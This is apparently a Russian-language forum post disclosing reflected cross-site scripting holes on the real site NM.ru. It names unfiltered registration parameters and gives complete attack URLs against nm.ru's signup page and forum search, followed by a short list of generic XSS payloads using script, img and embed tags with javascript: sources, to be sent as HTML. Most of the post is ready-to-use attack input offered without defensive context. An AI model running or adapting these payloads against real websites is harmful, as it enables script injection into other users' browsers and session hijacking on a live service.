|
XSS на NM.ru
Не фильтруются: login, quest, answ.
Код:
_http://www.nm.ru/users/reg.dhtml?__post=1&login="><script>alert('XSS')%3B</script>&domain=newmail%2Eru&passwd=1&pass2=1&quest_helper=%C4%E0%F2%E0%20%F0%EE%E6%E4%E5%ED%E8%FF%20%C2%E0%F8%E5%E9%20%E1%E0%E1%F3%F8%EA%E8%3F&quest=1&answ=1И Код:
_http://www.nm.ru/users/help/forum.dhtml?search="><script>alert('XSS')%3B</script>&session_id=1&fid=2. |
Вот еще несколько активных xss:
<script>alert(xss)</script> <image src=javascript:alert(xss)> <embed src=javascript:alert(xss);this.avi> <img src=javascript:alert(xss)> Отправляем в виде HTML. |
| Время: 03:33 |